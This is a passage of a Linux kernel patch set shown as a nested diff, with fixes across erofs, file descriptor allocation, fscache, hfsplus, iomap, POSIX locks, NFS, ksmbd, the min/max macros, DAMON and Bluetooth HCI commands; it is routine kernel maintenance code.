+@@ -763,6 +763,8 @@ int z_erofs_map_blocks_iter(struct inode *inode, struct erofs_map_blocks *map,
+ 
+ 	err = z_erofs_do_map_blocks(inode, map, flags);
+ out:
++	if (err)
++		map->m_llen = 0;
+ 	trace_z_erofs_map_blocks_iter_exit(inode, map, flags, err);
+ 
+ 	/* aggressively BUG_ON iff CONFIG_EROFS_FS_DEBUG is on */
+diff --git a/fs/file.c b/fs/file.c
+index dbca26ef7a01a..69386c2e37c50 100644
+--- a/fs/file.c
++++ b/fs/file.c
+@@ -481,12 +481,12 @@ struct files_struct init_files = {
+ 
+ static unsigned int find_next_fd(struct fdtable *fdt, unsigned int start)
+ {
+-	unsigned int maxfd = fdt->max_fds;
++	unsigned int maxfd = fdt->max_fds; /* always multiple of BITS_PER_LONG */
+ 	unsigned int maxbit = maxfd / BITS_PER_LONG;
+ 	unsigned int bitbit = start / BITS_PER_LONG;
+ 
+ 	bitbit = find_next_zero_bit(fdt->full_fds_bits, maxbit, bitbit) * BITS_PER_LONG;
+-	if (bitbit > maxfd)
++	if (bitbit >= maxfd)
+ 		return maxfd;
+ 	if (bitbit > start)
+ 		start = bitbit;
+diff --git a/fs/fscache/internal.h b/fs/fscache/internal.h
+index 1336f517e9b1a..4799a722bc285 100644
+--- a/fs/fscache/internal.h
++++ b/fs/fscache/internal.h
+@@ -145,8 +145,6 @@ extern const struct seq_operations fscache_volumes_seq_ops;
+ 
+ struct fscache_volume *fscache_get_volume(struct fscache_volume *volume,
+ 					  enum fscache_volume_trace where);
+-void fscache_put_volume(struct fscache_volume *volume,
+-			enum fscache_volume_trace where);
+ bool fscache_begin_volume_access(struct fscache_volume *volume,
+ 				 struct fscache_cookie *cookie,
+ 				 enum fscache_access_trace why);
+diff --git a/fs/fscache/volume.c b/fs/fscache/volume.c
+index cdf991bdd9def..cb75c07b5281a 100644
+--- a/fs/fscache/volume.c
++++ b/fs/fscache/volume.c
+@@ -27,6 +27,19 @@ struct fscache_volume *fscache_get_volume(struct fscache_volume *volume,
+ 	return volume;
+ }
+ 
++struct fscache_volume *fscache_try_get_volume(struct fscache_volume *volume,
++					      enum fscache_volume_trace where)
++{
++	int ref;
++
++	if (!__refcount_inc_not_zero(&volume->ref, &ref))
++		return NULL;
++
++	trace_fscache_volume(volume->debug_id, ref + 1, where);
++	return volume;
++}
++EXPORT_SYMBOL(fscache_try_get_volume);
++
+ static void fscache_see_volume(struct fscache_volume *volume,
+ 			       enum fscache_volume_trace where)
+ {
+@@ -420,6 +433,7 @@ void fscache_put_volume(struct fscache_volume *volume,
+ 			fscache_free_volume(volume);
+ 	}
+ }
++EXPORT_SYMBOL(fscache_put_volume);
+ 
+ /*
+  * Relinquish a volume representation cookie.
+diff --git a/fs/hfsplus/xattr.c b/fs/hfsplus/xattr.c
+index 49891b12c4156..2b0e0ba58139b 100644
+--- a/fs/hfsplus/xattr.c
++++ b/fs/hfsplus/xattr.c
+@@ -699,7 +699,7 @@ ssize_t hfsplus_listxattr(struct dentry *dentry, char *buffer, size_t size)
+ 		return err;
+ 	}
+ 
+-	strbuf = kmalloc(NLS_MAX_CHARSET_SIZE * HFSPLUS_ATTR_MAX_STRLEN +
++	strbuf = kzalloc(NLS_MAX_CHARSET_SIZE * HFSPLUS_ATTR_MAX_STRLEN +
+ 			XATTR_MAC_OSX_PREFIX_LEN + 1, GFP_KERNEL);
+ 	if (!strbuf) {
+ 		res = -ENOMEM;
+diff --git a/fs/iomap/buffered-io.c b/fs/iomap/buffered-io.c
+index dac1a5c110c0e..0f7dabc6c764e 100644
+--- a/fs/iomap/buffered-io.c
++++ b/fs/iomap/buffered-io.c
+@@ -97,6 +97,7 @@ static void iomap_adjust_read_range(struct inode *inode, struct folio *folio,
+ 	unsigned block_size = (1 << block_bits);
+ 	size_t poff = offset_in_folio(folio, *pos);
+ 	size_t plen = min_t(loff_t, folio_size(folio) - poff, length);
++	size_t orig_plen = plen;
+ 	unsigned first = poff >> block_bits;
+ 	unsigned last = (poff + plen - 1) >> block_bits;
+ 
+@@ -133,7 +134,7 @@ static void iomap_adjust_read_range(struct inode *inode, struct folio *folio,
+ 	 * handle both halves separately so that we properly zero data in the
+ 	 * page cache for blocks that are entirely outside of i_size.
+ 	 */
+-	if (orig_pos <= isize && orig_pos + length > isize) {
++	if (orig_pos <= isize && orig_pos + orig_plen > isize) {
+ 		unsigned end = offset_in_folio(folio, isize - 1) >> block_bits;
+ 
+ 		if (first <= end && last > end)
+diff --git a/fs/locks.c b/fs/locks.c
+index c23bcfe9b0fdd..5aa574fec3026 100644
+--- a/fs/locks.c
++++ b/fs/locks.c
+@@ -2394,8 +2394,9 @@ int fcntl_setlk(unsigned int fd, struct file *filp, unsigned int cmd,
+ 	error = do_lock_file_wait(filp, cmd, file_lock);
+ 
+ 	/*
+-	 * Attempt to detect a close/fcntl race and recover by releasing the
+-	 * lock that was just acquired. There is no need to do that when we're
++	 * Detect close/fcntl races and recover by zapping all POSIX locks
++	 * associated with this file and our files_struct, just like on
++	 * filp_flush(). There is no need to do that when we're
+ 	 * unlocking though, or for OFD locks.
+ 	 */
+ 	if (!error && file_lock->fl_type != F_UNLCK &&
+@@ -2410,9 +2411,7 @@ int fcntl_setlk(unsigned int fd, struct file *filp, unsigned int cmd,
+ 		f = files_lookup_fd_locked(files, fd);
+ 		spin_unlock(&files->file_lock);
+ 		if (f != filp) {
+-			file_lock->fl_type = F_UNLCK;
+-			error = do_lock_file_wait(filp, cmd, file_lock);
+-			WARN_ON_ONCE(error);
++			locks_remove_posix(filp, files);
+ 			error = -EBADF;
+ 		}
+ 	}
+diff --git a/fs/nfs/dir.c b/fs/nfs/dir.c
+index a5a4d9422d6ed..70660ff248b79 100644
+--- a/fs/nfs/dir.c
++++ b/fs/nfs/dir.c
+@@ -1615,7 +1615,16 @@ nfs_lookup_revalidate_done(struct inode *dir, struct dentry *dentry,
+ 	switch (error) {
+ 	case 1:
+ 		break;
+-	case 0:
++	case -ETIMEDOUT:
++		if (inode && (IS_ROOT(dentry) ||
++			      NFS_SERVER(inode)->flags & NFS_MOUNT_SOFTREVAL))
++			error = 1;
++		break;
++	case -ESTALE:
++	case -ENOENT:
++		error = 0;
++		fallthrough;
++	default:
+ 		/*
+ 		 * We can't d_drop the root of a disconnected tree:
+ 		 * its d_hash is on the s_anon list and d_drop() would hide
+@@ -1670,18 +1679,8 @@ static int nfs_lookup_revalidate_dentry(struct inode *dir,
+ 
+ 	dir_verifier = nfs_save_change_attribute(dir);
+ 	ret = NFS_PROTO(dir)->lookup(dir, dentry, fhandle, fattr);
+-	if (ret < 0) {
+-		switch (ret) {
+-		case -ESTALE:
+-		case -ENOENT:
+-			ret = 0;
+-			break;
+-		case -ETIMEDOUT:
+-			if (NFS_SERVER(inode)->flags & NFS_MOUNT_SOFTREVAL)
+-				ret = 1;
+-		}
++	if (ret < 0)
+ 		goto out;
+-	}
+ 
+ 	/* Request help from readdirplus */
+ 	nfs_lookup_advise_force_readdirplus(dir, flags);
+@@ -1725,7 +1724,7 @@ nfs_do_lookup_revalidate(struct inode *dir, struct dentry *dentry,
+ 			 unsigned int flags)
+ {
+ 	struct inode *inode;
+-	int error;
++	int error = 0;
+ 
+ 	nfs_inc_stats(dir, NFSIOS_DENTRYREVALIDATE);
+ 	inode = d_inode(dentry);
+@@ -1770,7 +1769,7 @@ nfs_do_lookup_revalidate(struct inode *dir, struct dentry *dentry,
+ out_bad:
+ 	if (flags & LOOKUP_RCU)
+ 		return -ECHILD;
+-	return nfs_lookup_revalidate_done(dir, dentry, inode, 0);
++	return nfs_lookup_revalidate_done(dir, dentry, inode, error);
+ }
+ 
+ static int
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index ec641a8f6604b..cc620fc7aaf7b 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -6274,6 +6274,7 @@ nfs4_set_security_label(struct inode *inode, const void *buf, size_t buflen)
+ 	if (status == 0)
+ 		nfs_setsecurity(inode, fattr);
+ 
++	nfs_free_fattr(fattr);
+ 	return status;
+ }
+ #endif	/* CONFIG_NFS_V4_SECURITY_LABEL */
+diff --git a/fs/nfs/symlink.c b/fs/nfs/symlink.c
+index 0e27a2e4e68b8..13818129d268f 100644
+--- a/fs/nfs/symlink.c
++++ b/fs/nfs/symlink.c
+@@ -41,7 +41,7 @@ static int nfs_symlink_filler(struct file *file, struct folio *folio)
+ error:
+ 	folio_set_error(folio);
+ 	folio_unlock(folio);
+-	return -EIO;
++	return error;
+ }
+ 
+ static const char *nfs_get_link(struct dentry *dentry,
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+index 13d038a96a5c0..78340d904c7b9 100644
+--- a/fs/smb/client/cifsfs.c
++++ b/fs/smb/client/cifsfs.c
+@@ -1397,7 +1397,7 @@ ssize_t cifs_file_copychunk_range(unsigned int xid,
+ 	target_tcon = tlink_tcon(smb_file_target->tlink);
+ 
+ 	if (src_tcon->ses != target_tcon->ses) {
+-		cifs_dbg(VFS, "source and target of copy not on same server\n");
++		cifs_dbg(FYI, "source and target of copy not on same server\n");
+ 		goto out;
+ 	}
+ 
+diff --git a/fs/smb/common/smb2pdu.h b/fs/smb/common/smb2pdu.h
+index 25383b11d01b9..7d69a2a1d3ba4 100644
+--- a/fs/smb/common/smb2pdu.h
++++ b/fs/smb/common/smb2pdu.h
+@@ -905,6 +905,40 @@ struct smb2_query_directory_rsp {
+ 	__u8   Buffer[];
+ } __packed;
+ 
++/* DeviceType Flags */
++#define FILE_DEVICE_CD_ROM              0x00000002
++#define FILE_DEVICE_CD_ROM_FILE_SYSTEM  0x00000003
++#define FILE_DEVICE_DFS                 0x00000006
++#define FILE_DEVICE_DISK                0x00000007
++#define FILE_DEVICE_DISK_FILE_SYSTEM    0x00000008
++#define FILE_DEVICE_FILE_SYSTEM         0x00000009
++#define FILE_DEVICE_NAMED_PIPE          0x00000011
++#define FILE_DEVICE_NETWORK             0x00000012
++#define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x00000014
++#define FILE_DEVICE_NULL                0x00000015
++#define FILE_DEVICE_PARALLEL_PORT       0x00000016
++#define FILE_DEVICE_PRINTER             0x00000018
++#define FILE_DEVICE_SERIAL_PORT         0x0000001b
++#define FILE_DEVICE_STREAMS             0x0000001e
++#define FILE_DEVICE_TAPE                0x0000001f
++#define FILE_DEVICE_TAPE_FILE_SYSTEM    0x00000020
++#define FILE_DEVICE_VIRTUAL_DISK        0x00000024
++#define FILE_DEVICE_NETWORK_REDIRECTOR  0x00000028
++
++/* Device Characteristics */
++#define FILE_REMOVABLE_MEDIA			0x00000001
++#define FILE_READ_ONLY_DEVICE			0x00000002
++#define FILE_FLOPPY_DISKETTE			0x00000004
++#define FILE_WRITE_ONCE_MEDIA			0x00000008
++#define FILE_REMOTE_DEVICE			0x00000010
++#define FILE_DEVICE_IS_MOUNTED			0x00000020
++#define FILE_VIRTUAL_VOLUME			0x00000040
++#define FILE_DEVICE_SECURE_OPEN			0x00000100
++#define FILE_CHARACTERISTIC_TS_DEVICE		0x00001000
++#define FILE_CHARACTERISTIC_WEBDAV_DEVICE	0x00002000
++#define FILE_PORTABLE_DEVICE			0x00004000
++#define FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL 0x00020000
++
+ /*
+  * Maximum number of iovs we need for a set-info request.
+  * The largest one is rename/hardlink
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 6344bc81736c0..4ba6bf1535da1 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -5048,8 +5048,13 @@ static int smb2_get_info_filesystem(struct ksmbd_work *work,
+ 
+ 		info = (struct filesystem_device_info *)rsp->Buffer;
+ 
+-		info->DeviceType = cpu_to_le32(stfs.f_type);
+-		info->DeviceCharacteristics = cpu_to_le32(0x00000020);
++		info->DeviceType = cpu_to_le32(FILE_DEVICE_DISK);
++		info->DeviceCharacteristics =
++			cpu_to_le32(FILE_DEVICE_IS_MOUNTED);
++		if (!test_tree_conn_flag(work->tcon,
++					 KSMBD_TREE_CONN_FLAG_WRITABLE))
++			info->DeviceCharacteristics |=
++				cpu_to_le32(FILE_READ_ONLY_DEVICE);
+ 		rsp->OutputBufferLength = cpu_to_le32(8);
+ 		break;
+ 	}
+diff --git a/include/linux/fscache-cache.h b/include/linux/fscache-cache.h
+index a174cedf4d907..35e86d2f2887b 100644
+--- a/include/linux/fscache-cache.h
++++ b/include/linux/fscache-cache.h
+@@ -19,6 +19,7 @@
+ enum fscache_cache_trace;
+ enum fscache_cookie_trace;
+ enum fscache_access_trace;
++enum fscache_volume_trace;
+ 
+ enum fscache_cache_state {
+ 	FSCACHE_CACHE_IS_NOT_PRESENT,	/* No cache is present for this name */
+@@ -97,6 +98,11 @@ extern void fscache_withdraw_cookie(struct fscache_cookie *cookie);
+ 
+ extern void fscache_io_error(struct fscache_cache *cache);
+ 
++extern struct fscache_volume *
++fscache_try_get_volume(struct fscache_volume *volume,
++		       enum fscache_volume_trace where);
++extern void fscache_put_volume(struct fscache_volume *volume,
++			       enum fscache_volume_trace where);
+ extern void fscache_end_volume_access(struct fscache_volume *volume,
+ 				      struct fscache_cookie *cookie,
+ 				      enum fscache_access_trace why);
+diff --git a/include/linux/minmax.h b/include/linux/minmax.h
+index 1aea34b8f19bf..dd52969698f74 100644
+--- a/include/linux/minmax.h
++++ b/include/linux/minmax.h
+@@ -2,54 +2,93 @@
+ #ifndef _LINUX_MINMAX_H
+ #define _LINUX_MINMAX_H
+ 
++#include <linux/build_bug.h>
++#include <linux/compiler.h>
+ #include <linux/const.h>
+ 
+ /*
+  * min()/max()/clamp() macros must accomplish three things:
+  *
+- * - avoid multiple evaluations of the arguments (so side-effects like
++ * - Avoid multiple evaluations of the arguments (so side-effects like
+  *   "x++" happen only once) when non-constant.
+- * - perform strict type-checking (to generate warnings instead of
+- *   nasty runtime surprises). See the "unnecessary" pointer comparison
+- *   in __typecheck().
+- * - retain result as a constant expressions when called with only
++ * - Retain result as a constant expressions when called with only
+  *   constant expressions (to avoid tripping VLA warnings in stack
+  *   allocation usage).
++ * - Perform signed v unsigned type-checking (to generate compile
++ *   errors instead of nasty runtime surprises).
++ * - Unsigned char/short are always promoted to signed int and can be
++ *   compared against signed or unsigned arguments.
++ * - Unsigned arguments can be compared against non-negative signed constants.
++ * - Comparison of a signed argument against an unsigned constant fails
++ *   even if the constant is below __INT_MAX__ and could be cast to int.
+  */
+ #define __typecheck(x, y) \
+ 	(!!(sizeof((typeof(x) *)1 == (typeof(y) *)1)))
+ 
+-#define __no_side_effects(x, y) \
+-		(__is_constexpr(x) && __is_constexpr(y))
++/* is_signed_type() isn't a constexpr for pointer types */
++#define __is_signed(x) 								\
++	__builtin_choose_expr(__is_constexpr(is_signed_type(typeof(x))),	\
++		is_signed_type(typeof(x)), 0)
+ 
+-#define __safe_cmp(x, y) \
+-		(__typecheck(x, y) && __no_side_effects(x, y))
++/* True for a non-negative signed int constant */
++#define __is_noneg_int(x)	\
++	(__builtin_choose_expr(__is_constexpr(x) && __is_signed(x), x, -1) >= 0)
+ 
+-#define __cmp(x, y, op)	((x) op (y) ? (x) : (y))
++#define __types_ok(x, y) 					\
++	(__is_signed(x) == __is_signed(y) ||			\
++		__is_signed((x) + 0) == __is_signed((y) + 0) ||	\
++		__is_noneg_int(x) || __is_noneg_int(y))
+ 
+-#define __cmp_once(x, y, unique_x, unique_y, op) ({	\
++#define __cmp_op_min <
++#define __cmp_op_max >
++
++#define __cmp(op, x, y)	((x) __cmp_op_##op (y) ? (x) : (y))
++
++#define __cmp_once(op, x, y, unique_x, unique_y) ({	\
+ 		typeof(x) unique_x = (x);		\
+ 		typeof(y) unique_y = (y);		\
+-		__cmp(unique_x, unique_y, op); })
+-
+-#define __careful_cmp(x, y, op) \
+-	__builtin_choose_expr(__safe_cmp(x, y), \
+-		__cmp(x, y, op), \
+-		__cmp_once(x, y, __UNIQUE_ID(__x), __UNIQUE_ID(__y), op))
++		static_assert(__types_ok(x, y),		\
++			#op "(" #x ", " #y ") signedness error, fix types or consider u" #op "() before " #op "_t()"); \
++		__cmp(op, unique_x, unique_y); })
++
++#define __careful_cmp(op, x, y)					\
++	__builtin_choose_expr(__is_constexpr((x) - (y)),	\
++		__cmp(op, x, y),				\
++		__cmp_once(op, x, y, __UNIQUE_ID(__x), __UNIQUE_ID(__y)))
++
++#define __clamp(val, lo, hi)	\
++	((val) >= (hi) ? (hi) : ((val) <= (lo) ? (lo) : (val)))
++
++#define __clamp_once(val, lo, hi, unique_val, unique_lo, unique_hi) ({	\
++		typeof(val) unique_val = (val);				\
++		typeof(lo) unique_lo = (lo);				\
++		typeof(hi) unique_hi = (hi);				\
++		static_assert(__builtin_choose_expr(__is_constexpr((lo) > (hi)), 	\
++				(lo) <= (hi), true),					\
++			"clamp() low limit " #lo " greater than high limit " #hi);	\
++		static_assert(__types_ok(val, lo), "clamp() 'lo' signedness error");	\
++		static_assert(__types_ok(val, hi), "clamp() 'hi' signedness error");	\
++		__clamp(unique_val, unique_lo, unique_hi); })
++
++#define __careful_clamp(val, lo, hi) ({					\
++	__builtin_choose_expr(__is_constexpr((val) - (lo) + (hi)),	\
++		__clamp(val, lo, hi),					\
++		__clamp_once(val, lo, hi, __UNIQUE_ID(__val),		\
++			     __UNIQUE_ID(__lo), __UNIQUE_ID(__hi))); })
+ 
+ /**
+  * min - return minimum of two values of the same or compatible types
+  * @x: first value
+  * @y: second value
+  */
+-#define min(x, y)	__careful_cmp(x, y, <)
++#define min(x, y)	__careful_cmp(min, x, y)
+ 
+ /**
+  * max - return maximum of two values of the same or compatible types
+  * @x: first value
+  * @y: second value
+  */
+-#define max(x, y)	__careful_cmp(x, y, >)
++#define max(x, y)	__careful_cmp(max, x, y)
+ 
+ /**
+  * umin - return minimum of two non-negative values
+@@ -58,7 +97,7 @@
+  * @y: second value
+  */
+ #define umin(x, y)	\
+-	__careful_cmp((x) + 0u + 0ul + 0ull, (y) + 0u + 0ul + 0ull, <)
++	__careful_cmp(min, (x) + 0u + 0ul + 0ull, (y) + 0u + 0ul + 0ull)
+ 
+ /**
+  * umax - return maximum of two non-negative values
+@@ -66,7 +105,7 @@
+  * @y: second value
+  */
+ #define umax(x, y)	\
+-	__careful_cmp((x) + 0u + 0ul + 0ull, (y) + 0u + 0ul + 0ull, >)
++	__careful_cmp(max, (x) + 0u + 0ul + 0ull, (y) + 0u + 0ul + 0ull)
+ 
+ /**
+  * min3 - return minimum of three values
+@@ -103,7 +142,7 @@
+  * This macro does strict typechecking of @lo/@hi to make sure they are of the
+  * same type as @val.  See the unnecessary pointer comparisons.
+  */
+-#define clamp(val, lo, hi) min((typeof(val))max(val, lo), hi)
++#define clamp(val, lo, hi) __careful_clamp(val, lo, hi)
+ 
+ /*
+  * ..and if you can't take the strict
+@@ -118,7 +157,7 @@
+  * @x: first value
+  * @y: second value
+  */
+-#define min_t(type, x, y)	__careful_cmp((type)(x), (type)(y), <)
++#define min_t(type, x, y)	__careful_cmp(min, (type)(x), (type)(y))
+ 
+ /**
+  * max_t - return maximum of two values, using the specified type
+@@ -126,7 +165,7 @@
+  * @x: first value
+  * @y: second value
+  */
+-#define max_t(type, x, y)	__careful_cmp((type)(x), (type)(y), >)
++#define max_t(type, x, y)	__careful_cmp(max, (type)(x), (type)(y))
+ 
+ /**
+  * clamp_t - return a value clamped to a given range using a given type
+@@ -138,7 +177,7 @@
+  * This macro does no typechecking and uses temporary variables of type
+  * @type to make all the comparisons.
+  */
+-#define clamp_t(type, val, lo, hi) min_t(type, max_t(type, val, lo), hi)
++#define clamp_t(type, val, lo, hi) __careful_clamp((type)(val), (type)(lo), (type)(hi))
+ 
+ /**
+  * clamp_val - return a value clamped to a given range using val's type
+diff --git a/include/net/bluetooth/hci_sync.h b/include/net/bluetooth/hci_sync.h
+index 59d15b1a978ab..7accd5ff0760b 100644
+--- a/include/net/bluetooth/hci_sync.h
++++ b/include/net/bluetooth/hci_sync.h
+@@ -35,6 +35,8 @@ int __hci_cmd_sync_status(struct hci_dev *hdev, u16 opcode, u32 plen,
+ int __hci_cmd_sync_status_sk(struct hci_dev *hdev, u16 opcode, u32 plen,
+ 			     const void *param, u8 event, u32 timeout,
+ 			     struct sock *sk);
++int hci_cmd_sync_status(struct hci_dev *hdev, u16 opcode, u32 plen,
++			const void *param, u32 timeout);
+ 
+ void hci_cmd_sync_init(struct hci_dev *hdev);
+ void hci_cmd_sync_clear(struct hci_dev *hdev);
+diff --git a/include/sound/dmaengine_pcm.h b/include/sound/dmaengine_pcm.h
+index 2df54cf02cb33..74b8ef419d4fa 100644
+--- a/include/sound/dmaengine_pcm.h
++++ b/include/sound/dmaengine_pcm.h
+@@ -36,6 +36,7 @@ snd_pcm_uframes_t snd_dmaengine_pcm_pointer_no_residue(struct snd_pcm_substream
+ int snd_dmaengine_pcm_open(struct snd_pcm_substream *substream,
+ 	struct dma_chan *chan);
+ int snd_dmaengine_pcm_close(struct snd_pcm_substream *substream);
++int snd_dmaengine_pcm_sync_stop(struct snd_pcm_substream *substream);
+ 
+ int snd_dmaengine_pcm_open_request_chan(struct snd_pcm_substream *substream,
+ 	dma_filter_fn filter_fn, void *filter_data);
+diff --git a/include/trace/events/fscache.h b/include/trace/events/fscache.h
+index a6190aa1b4060..f1a73aa83fbbf 100644
+--- a/include/trace/events/fscache.h
++++ b/include/trace/events/fscache.h
+@@ -35,12 +35,14 @@ enum fscache_volume_trace {
+ 	fscache_volume_get_cookie,
+ 	fscache_volume_get_create_work,
+ 	fscache_volume_get_hash_collision,
++	fscache_volume_get_withdraw,
+ 	fscache_volume_free,
+ 	fscache_volume_new_acquire,
+ 	fscache_volume_put_cookie,
+ 	fscache_volume_put_create_work,
+ 	fscache_volume_put_hash_collision,
+ 	fscache_volume_put_relinquish,
++	fscache_volume_put_withdraw,
+ 	fscache_volume_see_create_work,
+ 	fscache_volume_see_hash_wake,
+ 	fscache_volume_wait_create_work,
+@@ -120,12 +122,14 @@ enum fscache_access_trace {
+ 	EM(fscache_volume_get_cookie,		"GET cook ")		\
+ 	EM(fscache_volume_get_create_work,	"GET creat")		\
+ 	EM(fscache_volume_get_hash_collision,	"GET hcoll")		\
++	EM(fscache_volume_get_withdraw,		"GET withd")            \
+ 	EM(fscache_volume_free,			"FREE     ")		\
+ 	EM(fscache_volume_new_acquire,		"NEW acq  ")		\
+ 	EM(fscache_volume_put_cookie,		"PUT cook ")		\
+ 	EM(fscache_volume_put_create_work,	"PUT creat")		\
+ 	EM(fscache_volume_put_hash_collision,	"PUT hcoll")		\
+ 	EM(fscache_volume_put_relinquish,	"PUT relnq")		\
++	EM(fscache_volume_put_withdraw,		"PUT withd")            \
+ 	EM(fscache_volume_see_create_work,	"SEE creat")		\
+ 	EM(fscache_volume_see_hash_wake,	"SEE hwake")		\
+ 	E_(fscache_volume_wait_create_work,	"WAIT crea")
+diff --git a/mm/damon/core.c b/mm/damon/core.c
+index 5db9bec8ae67c..ab5c351b276ce 100644
+--- a/mm/damon/core.c
++++ b/mm/damon/core.c
+@@ -921,14 +921,31 @@ static void damon_merge_regions_of(struct damon_target *t, unsigned int thres,
+  * access frequencies are similar.  This is for minimizing the monitoring
+  * overhead under the dynamically changeable access pattern.  If a merge was
+  * unnecessarily made, later 'kdamond_split_regions()' will revert it.
++ *
++ * The total number of regions could be higher than the user-defined limit,
++ * max_nr_regions for some cases.  For example, the user can update
++ * max_nr_regions to a number that lower than the current number of regions
++ * while DAMON is running.  For such a case, repeat merging until the limit is
++ * met while increasing @threshold up to possible maximum level.
+  */
+ static void kdamond_merge_regions(struct damon_ctx *c, unsigned int threshold,
+ 				  unsigned long sz_limit)
+ {
+ 	struct damon_target *t;
++	unsigned int nr_regions;
++	unsigned int max_thres;
+ 
+-	damon_for_each_target(t, c)
+-		damon_merge_regions_of(t, threshold, sz_limit);
++	max_thres = c->attrs.aggr_interval /
++		(c->attrs.sample_interval ?  c->attrs.sample_interval : 1);
++	do {
++		nr_regions = 0;
++		damon_for_each_target(t, c) {
++			damon_merge_regions_of(t, threshold, sz_limit);
++			nr_regions += damon_nr_regions(t);
++		}
++		threshold = max(1, threshold * 2);
++	} while (nr_regions > c->attrs.max_nr_regions &&
++			threshold / 2 < max_thres);
+ }
+ 
+ /*
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index d6be3cb86598e..398a324657697 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -63,50 +63,6 @@ DEFINE_MUTEX(hci_cb_list_lock);
+ /* HCI ID Numbering */
+ static DEFINE_IDA(hci_index_ida);
+ 
+-static int hci_scan_req(struct hci_request *req, unsigned long opt)
+-{
+-	__u8 scan = opt;
+-
+-	BT_DBG("%s %x", req->hdev->name, scan);
+-
+-	/* Inquiry and Page scans */
+-	hci_req_add(req, HCI_OP_WRITE_SCAN_ENABLE, 1, &scan);
+-	return 0;
+-}
+-
+-static int hci_auth_req(struct hci_request *req, unsigned long opt)
+-{
+-	__u8 auth = opt;
+-
+-	BT_DBG("%s %x", req->hdev->name, auth);
+-
+-	/* Authentication */
+-	hci_req_add(req, HCI_OP_WRITE_AUTH_ENABLE, 1, &auth);
+-	return 0;
+-}
+-
+-static int hci_encrypt_req(struct hci_request *req, unsigned long opt)
+-{
+-	__u8 encrypt = opt;
+-
+-	BT_DBG("%s %x", req->hdev->name, encrypt);
+-
+-	/* Encryption */
+-	hci_req_add(req, HCI_OP_WRITE_ENCRYPT_MODE, 1, &encrypt);
+-	return 0;
+-}
+-
+-static int hci_linkpol_req(struct hci_request *req, unsigned long opt)
+-{
+-	__le16 policy = cpu_to_le16(opt);
+-
+-	BT_DBG("%s %x", req->hdev->name, policy);
+-
+-	/* Default link policy */
+-	hci_req_add(req, HCI_OP_WRITE_DEF_LINK_POLICY, 2, &policy);
+-	return 0;
+-}
+-
+ /* Get HCI device by index.
+  * Device is held on return. */
+ struct hci_dev *hci_dev_get(int index)
+@@ -733,6 +689,7 @@ int hci_dev_cmd(unsigned int cmd, void __user *arg)
+ {
+ 	struct hci_dev *hdev;
+ 	struct hci_dev_req dr;
++	__le16 policy;
+ 	int err = 0;
+ 
+ 	if (copy_from_user(&dr, arg, sizeof(dr)))
+@@ -764,8 +721,8 @@ int hci_dev_cmd(unsigned int cmd, void __user *arg)
+ 
+ 	switch (cmd) {
+ 	case HCISETAUTH:
+-		err = hci_req_sync(hdev, hci_auth_req, dr.dev_opt,
+-				   HCI_INIT_TIMEOUT, NULL);
++		err = __hci_cmd_sync_status(hdev, HCI_OP_WRITE_AUTH_ENABLE,
++					    1, &dr.dev_opt, HCI_CMD_TIMEOUT);
+ 		break;
+ 
+ 	case HCISETENCRYPT:
+@@ -776,19 +733,23 @@ int hci_dev_cmd(unsigned int cmd, void __user *arg)
+ 
+ 		if (!test_bit(HCI_AUTH, &hdev->flags)) {
+ 			/* Auth must be enabled first */
+-			err = hci_req_sync(hdev, hci_auth_req, dr.dev_opt,
+-					   HCI_INIT_TIMEOUT, NULL);
++			err = __hci_cmd_sync_status(hdev,
++						    HCI_OP_WRITE_AUTH_ENABLE,
++						    1, &dr.dev_opt,
++						    HCI_CMD_TIMEOUT);
+ 			if (err)
+ 				break;
+ 		}
+ 
+-		err = hci_req_sync(hdev, hci_encrypt_req, dr.dev_opt,
+-				   HCI_INIT_TIMEOUT, NULL);
++		err = __hci_cmd_sync_status(hdev, HCI_OP_WRITE_ENCRYPT_MODE,
++					    1, &dr.dev_opt,
++					    HCI_CMD_TIMEOUT);
+ 		break;
+ 
+ 	case HCISETSCAN:
+-		err = hci_req_sync(hdev, hci_scan_req, dr.dev_opt,
+-				   HCI_INIT_TIMEOUT, NULL);
++		err = __hci_cmd_sync_status(hdev, HCI_OP_WRITE_SCAN_ENABLE,
++					    1, &dr.dev_opt,
++					    HCI_CMD_TIMEOUT);
+ 
+ 		/* Ensure that the connectable and discoverable states
+ 		 * get correctly modified as this was a non-mgmt change.
+@@ -798,8 +759,11 @@ int hci_dev_cmd(unsigned int cmd, void __user *arg)
+ 		break;
+ 
+ 	case HCISETLINKPOL:
+-		err = hci_req_sync(hdev, hci_linkpol_req, dr.dev_opt,
+-				   HCI_INIT_TIMEOUT, NULL);
++		policy = cpu_to_le16(dr.dev_opt);
++
++		err = __hci_cmd_sync_status(hdev, HCI_OP_WRITE_DEF_LINK_POLICY,
++					    2, &policy,
++					    HCI_CMD_TIMEOUT);
+ 		break;
+ 
+ 	case HCISETLINKMODE:
+@@ -2727,7 +2691,11 @@ void hci_unregister_dev(struct hci_dev *hdev)
+ 	list_del(&hdev->list);
+ 	write_unlock(&hci_dev_list_lock);
+ 
++	cancel_work_sync(&hdev->rx_work);
++	cancel_work_sync(&hdev->cmd_work);
++	cancel_work_sync(&hdev->tx_work);
+ 	cancel_work_sync(&hdev->power_on);
++	cancel_work_sync(&hdev->error_reset);
+ 
+ 	hci_cmd_sync_clear(hdev);
+ 
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index e24b211b10ff5..57302021b7ebb 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -279,6 +279,19 @@ int __hci_cmd_sync_status(struct hci_dev *hdev, u16 opcode, u32 plen,
+ }
+ EXPORT_SYMBOL(__hci_cmd_sync_status);
+ 
++int hci_cmd_sync_status(struct hci_dev *hdev, u16 opcode, u32 plen,
++			const void *param, u32 timeout)
++{
++	int err;
++
++	hci_req_sync_lock(hdev);
